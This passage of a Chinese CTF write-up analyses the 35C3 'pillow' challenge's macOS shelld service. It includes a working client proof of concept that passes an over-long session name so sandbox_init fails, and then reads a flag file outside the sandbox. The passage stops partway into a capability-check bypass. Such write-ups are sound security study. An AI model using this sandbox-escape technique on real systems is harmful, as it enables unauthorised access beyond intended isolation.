KERN_FAILURE;</span><br></pre></td></tr></table></figure></li><li><p>接下来，判断信息发送者是否有权限执行 <code>/bin/bash</code>，因为子进程会调用 /bin/bash。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 判断传入的 creds 是否有权限执行 /bin/bash</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">sandbox_check_with_capabilities</span>(creds, <span class="string">&quot;process-exec*&quot;</span>, SANDBOX_CHECK_NO_REPORT, <span class="string">&quot;/bin/bash&quot;</span>)) &#123;</span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: denying request to sandboxed client %d\n&quot;</span>, <span class="built_in">audit_token_to_pid</span>(creds));</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中的 <code>sandbox_check_with_capabilities</code> 函数的操作如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_with_capabilities</span><span class="params">(<span class="type">audit_token_t</span> creds, <span class="type">const</span> <span class="type">char</span>* operation, <span class="type">int</span> flags, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">     <span class="comment">// 如果发送方本来就可以执行这个操作</span></span><br><span class="line">     <span class="type">int</span> result = <span class="built_in">sandbox_check_by_audit_token</span>(creds, operation, flags, arg);</span><br><span class="line">     <span class="keyword">if</span> (result != <span class="number">1</span>) &#123;</span><br><span class="line">         <span class="comment">// 则直接返回0 ，表示允许执行</span></span><br><span class="line">         <span class="keyword">return</span> result;</span><br><span class="line">     &#125;</span><br><span class="line">     <span class="comment">// 如果发送方不支持执行这个操作，则向 capsd 询问发送方之前是否请求了这个权限</span></span><br><span class="line">     <span class="type">int</span> client_has_capability = <span class="number">0</span>;</span><br><span class="line">     <span class="type">pid_t</span> pid = <span class="built_in">audit_token_to_pid</span>(creds);</span><br><span class="line">     <span class="built_in">has_capability</span>(capsd_service_port, pid, operation, arg, &amp;client_has_capability);</span><br><span class="line">     <span class="comment">// 如果 capsd 中的权限存在，即 client_has_capability ，则整个函数返回0，表示允许执行操作</span></span><br><span class="line">     <span class="keyword">return</span> !client_has_capability;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>之后，获取传入 session name 和 creds 所对应的 session，并创建一对管道。这对管道将用于重定向子进程的 stdout</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 获取当前 creds 所对应的 session</span></span><br><span class="line">CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, creds);</span><br><span class="line"><span class="keyword">if</span> (!session)</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line"><span class="comment">// 创建一堆 rw pipe，这对 pipe 将用于重定向子进程的 stdout</span></span><br><span class="line"><span class="type">int</span> fds[<span class="number">2</span>];</span><br><span class="line"><span class="built_in">ASSERT</span>(<span class="built_in">pipe</span>(fds) == <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li><li><p>接下来便是创建子进程，我们看看子进程做了什么工作：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 创建新进程</span></span><br><span class="line"><span class="type">int</span> pid = fork();</span><br><span class="line"><span class="keyword">if</span> (pid == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// 在子进程中</span></span><br><span class="line">    <span class="type">char</span>* argv[] = &#123;<span class="string">&quot;/bin/bash&quot;</span>, <span class="string">&quot;-c&quot;</span>, (<span class="type">char</span>*)command, <span class="literal">NULL</span>&#125;;</span><br><span class="line">    <span class="type">char</span>* envp[] = &#123;<span class="string">&quot;PATH=/bin:/usr/bin:/usr/sbin&quot;</span>, <span class="literal">NULL</span>&#125;;</span><br><span class="line">    <span class="comment">// 切换子进程的工作目录为先前创建的 session 文件夹</span></span><br><span class="line">    <span class="type">char</span> cwd[<span class="number">1024</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(cwd, <span class="built_in">sizeof</span>(cwd), <span class="string">&quot;/private/tmp/shelld/%s&quot;</span>, session_name);</span><br><span class="line">    <span class="built_in">chdir</span>(cwd);</span><br><span class="line">    <span class="comment">// 主动进入沙箱</span></span><br><span class="line">    <span class="type">char</span> profile[<span class="number">4096</span>];</span><br><span class="line">    <span class="built_in">snprintf</span>(profile, <span class="built_in">sizeof</span>(profile), sb_profile_template, session_name);</span><br><span class="line">    <span class="built_in">sandbox_init</span>(profile, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// 重定向 stdout</span></span><br><span class="line">    <span class="built_in">dup2</span>(fds[<span class="number">1</span>], STDOUT_FILENO);</span><br><span class="line">    <span class="built_in">close</span>(STDERR_FILENO);</span><br><span class="line">    <span class="built_in">close</span>(STDIN_FILENO);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(fds[<span class="number">0</span>]);</span><br><span class="line">    <span class="built_in">close</span>(fds[<span class="number">1</span>]);</span><br><span class="line">    <span class="comment">// 执行 bash</span></span><br><span class="line">    <span class="built_in">execve</span>(<span class="string">&quot;/bin/bash&quot;</span>, argv, envp);</span><br><span class="line">    _exit(<span class="number">-1</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (pid &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到，子进程先是<strong>切换了自己当前的工作目录</strong>，之后<strong>主动进入沙箱</strong>、<strong>重定向 stdout</strong>，并最终执行 bash 程序。</p><p>调用 <code>sandbox_init</code> 进入沙箱时，需要指定沙箱规则，我们看看子进程的沙箱规则模板是什么样的：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="type">char</span>* sb_profile_template =   <span class="string">&quot;(version 1)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(deny default)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(import \&quot;system.sb\&quot;)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow process-fork)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* file-write* (subpath \&quot;/private/tmp/shelld/%s\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read-data file-write-data (subpath \&quot;/dev/tty\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/sbin/\&quot;))\n&quot;</span>;</span><br></pre></td></tr></table></figure><p>这里配置了一些权限：</p><ul><li><p>使用白名单设置</p></li><li><p>导入 <code>/System/Library/Sandbox/Profiles/system.sb</code> 中的系统权限，这之中允许了 诸如读取 /dev/null、/dev/zero 文件等常用权限。</p></li><li><p>允许 fork</p></li><li><p>允许对该 session 工作路径下<strong>一切文件</strong>的<strong>任意信息</strong>的<strong>读写操作</strong></p><blockquote><p>这里的<strong>任意信息</strong>包括但不限于：文件数据、文件<strong>元</strong>数据、文件扩展属性等等。</p><p>即一个文件里所有能读的东西。</p></blockquote></li><li><p>允许对 /dev/tty 路径下任意文件的<strong>数据</strong>读取和写入操作</p></li><li><p>允许对 /bin、/usr/bin、/usr/sbin 文件夹下<strong>任意文件</strong>的<strong>读取与执行</strong></p></li></ul></li><li><p>回到父进程，接下来父进程注册<strong>子进程退出时的事件处理例程</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> rfd = fds[<span class="number">0</span>];</span><br><span class="line"></span><br><span class="line">__block <span class="type">int</span> running = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 注册进程退出时的清除事件</span></span><br><span class="line"><span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: bash spawned: %d\n&quot;</span>, pid);</span><br><span class="line"><span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_PROC, pid, DISPATCH_PROC_EXIT, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line"><span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">    running = <span class="literal">false</span>;</span><br><span class="line">    <span class="built_in">handle_process_exited</span>(pid, session, rfd);</span><br><span class="line">    <span class="built_in">dispatch_source_cancel</span>(source);</span><br><span class="line">    <span class="built_in">dispatch_release</span>(source);</span><br><span class="line">&#125;);</span><br><span class="line"><span class="built_in">dispatch_resume</span>(source);</span><br></pre></td></tr></table></figure><p>注意到处理例程内部调用的 <strong>handle_process_exited</strong> 函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">handle_process_exited</span><span class="params">(<span class="type">pid_t</span> pid, CFMutableDictionaryRef session, <span class="type">int</span> output_fileno)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> status;</span><br><span class="line">    <span class="built_in">waitpid</span>(pid, &amp;status, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: child %d exited with status %d&quot;</span>, pid, status);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> output[<span class="number">4096</span>];</span><br><span class="line">    <span class="type">size_t</span> nread = <span class="built_in">read</span>(output_fileno, output, <span class="built_in">sizeof</span>(output) - <span class="number">1</span>);</span><br><span class="line">    output[nread] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">CFDictionaryGetValueIfPresent</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), (<span class="type">const</span> <span class="type">void</span>**)&amp;value)) &#123;</span><br><span class="line">        <span class="type">mach_port_t</span> listener;</span><br><span class="line">        <span class="built_in">ASSERT</span>(<span class="built_in">CFNumberGetValue</span>(value, kCFNumberSInt32Type, &amp;listener));</span><br><span class="line">        <span class="built_in">shelld_client_notify</span>(listener, status, output);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(output_fileno);</span><br><span class="line">    <span class="built_in">CFRelease</span>(session);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>该函数会将子进程的 stdout 全部输出信息，读取 4096字节并将其发送给 listener port，即 client。</p></li><li><p>最后父进程注册子进程的超时处理例程，<strong>每个子进程最多运行 60s</strong>，若执行超时则会被立即 kill。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 设置子进程超时时间为 60s</span></span><br><span class="line"><span class="built_in">dispatch_after</span>(<span class="built_in">dispatch_time</span>(DISPATCH_TIME_NOW, <span class="number">60</span> * NSEC_PER_SEC), <span class="built_in">dispatch_get_main_queue</span>(), ^&#123;</span><br><span class="line">    <span class="keyword">if</span> (!running)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    <span class="built_in">os_log</span>(OS_LOG_DEFAULT, <span class="string">&quot;shelld: killing process %d due to timeout&quot;</span>, pid);</span><br><span class="line">    <span class="built_in">kill</span>(pid, SIGKILL);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure></li></ol><h4 id="d-client-c">d. client.c</h4><p>示例代码 client 中所做的事情不多，具体说明内嵌进代码中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_client_notify</span><span class="params">(<span class="type">mach_port_t</span> listener, <span class="type">int</span> status, <span class="type">const</span> <span class="type">char</span>* output)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Command finished with status %d and output: %s\n&quot;</span>, status, output);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;PID: %d\n&quot;</span>, <span class="built_in">getpid</span>());</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Press enter to continue...&quot;</span>);</span><br><span class="line">    <span class="built_in">getchar</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 获取 shelld 的mach port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建一对收发信息的 listener 和 listener_send_right</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 在 shelld 中创建一个 session</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">shelld_create_session</span>(sp, <span class="string">&quot;foo&quot;</span>) != KERN_SUCCESS) &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Failed to create session&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 将 listener_send_right 注册进 session 中的 listener</span></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;foo&quot;</span>, listener_send_right);</span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener_send_right);</span><br><span class="line">        </span><br><span class="line">    <span class="comment">// 设置自动处理 server 端调用的 notify 接口</span></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_client_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_activate</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// client 连续三次向 shelld 请求执行程序</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;echo Hello World &gt; bar&quot;</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;cat bar&quot;</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;foo&quot;</span>, <span class="string">&quot;cat bar&quot;</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行结果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108135403282.png" alt="image-20220108135403282"></p><h4 id="e-功能">e. 功能</h4><p>通过阅读上面的代码，我们可以了解到，shelld 会根据信息发送方的<strong>权限</strong>与<strong>请求</strong>，动态创建一个<strong>带有沙箱</strong>的子进程。这里的权限指的是 <code>capsd</code> 中存储的 capabilities。</p><h2 id="四、漏洞点">四、漏洞点</h2><p>当前的 exploit 位于沙箱中，因此无法直接读取外部的 flag。我们只能通过题目提供的两个服务来尝试进行沙箱逃逸，通过观察我们可以发现，shelld 中有个 shell_exec 函数可以执行一个新的程序，或许可以尝试让 shelld 启动一个子进程来读取  flag。但这里存在一些条件：</p><ol><li>shell_exec 中会先<strong>判断权限（即 capabilities）</strong>，没有 <code>&quot;process-exec* &quot;/bin/bash&quot;</code> 沙箱权限的请求者将无法让 shelld 启动新进程。很明显 Exploit 位于沙箱之中，沙箱规则没有提供这个权限，无法直接通过这个 check。</li><li>即便绕过了先前的权限判断，但 shell_exec 启动的<strong>子进程</strong>还会执行 <code>sandbox_init</code> 函数<strong>进入沙箱</strong>。一旦子进程进入沙箱，则子进程将无权读取 flag。</li></ol><p>我们先从简单的入手。</p><h3 id="1-sandbox-init-沙箱函数绕过">1. sandbox_init 沙箱函数绕过</h3><p>shell_exec 启动的子进程会执行 <code>sandbox_init</code> 函数，倘若该函数执行成功，那么子进程就无法读取到 flag。</p><p>那么，如何让 sandbox_init 函数执行失败呢？注意 sb_profile_template 字符串：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="type">char</span>* sb_profile_template =   <span class="string">&quot;(version 1)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(deny default)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(import \&quot;system.sb\&quot;)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow process-fork)\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* file-write* (subpath \&quot;/private/tmp/shelld/%s\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read-data file-write-data (subpath \&quot;/dev/tty\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/bin/\&quot;))\n&quot;</span></span><br><span class="line">                                    <span class="string">&quot;(allow file-read* process-exec (subpath \&quot;/usr/sbin/\&quot;))\n&quot;</span>;</span><br></pre></td></tr></table></figure><p>根据我的测试，scheme in AppSandboxProfile 的<strong>字符串长度不得超过 1023 字节</strong>。如果超过则 scheme profile 将解析出错，<code>sandbox_init</code> 函数直接返回，<strong>不会进入沙箱</strong>。</p><p>以下是测试结果：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108161115411.png" alt="image-20220108161115411"></p><p>因此，我们可以通过<strong>传入超长 session name</strong> 来绕过子进程的 sandbox 初始化操作，就像下面这个 client：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mig/shelld.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mig/shelld_client.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;common/utils.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;common/decls.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">shelld_client_server</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">mach_msg_header_t</span> *InHeadP,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">shelld_client_notify</span><span class="params">(<span class="type">mach_port_t</span> listener, <span class="type">int</span> status, <span class="type">const</span> <span class="type">char</span>* output)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Command finished with status %d and output: %s\n&quot;</span>, status, output);</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ./client `python -c &quot;print(&#x27;a&#x27;*3)&quot;`</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span>* session_name = argv[<span class="number">1</span>];</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;session_name: %s\n&quot;</span>, session_name);</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> aquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;aquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, session_name);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, session_name, listener_send_right);</span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), listener_send_right);</span><br><span class="line"></span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span class="built_in">dispatch_source_create</span>(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, <span class="number">0</span>, <span class="built_in">dispatch_get_main_queue</span>());</span><br><span class="line">    <span class="built_in">dispatch_source_set_event_handler</span>(source, ^&#123;</span><br><span class="line">        <span class="built_in">dispatch_mig_server</span>(source, MAX_MSG_SIZE, shelld_client_server);</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="built_in">dispatch_activate</span>(source);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 测试基本功能</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, session_name, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>));</span><br><span class="line">    <span class="comment">// 尝试读取沙箱外部数据</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, <span class="built_in">shell_exec</span>(sp, session_name, <span class="string">&quot;cat /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag&quot;</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">dispatch_main</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>运行结果如下：</p><p><img src="/2022/01/35c3ctf_pillow/image-20220108212040495.png" alt="image-20220108212040495"></p><p>可以看到当传入的 session name 超级长的时候，即可超过沙箱函数，读取到沙箱外部文件。</p><p>该问题成功解决。</p><h3 id="2-Capabilities-权限检测绕过">2. Capabilities 权限检测绕过</h3><blockquote><p>这里算是整个题目的重点，稍微有点复杂。</p></blockquote><h4 id="a-提出的设想">a. 提出的设想</h4><p>接下来我们需要绕过 sandbox_check_with_capabilities 检查。再贴一下它的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">sandbox_check_with_capabilities</span><span class="params">(<span class="type">audit_token_t</span> creds, <span 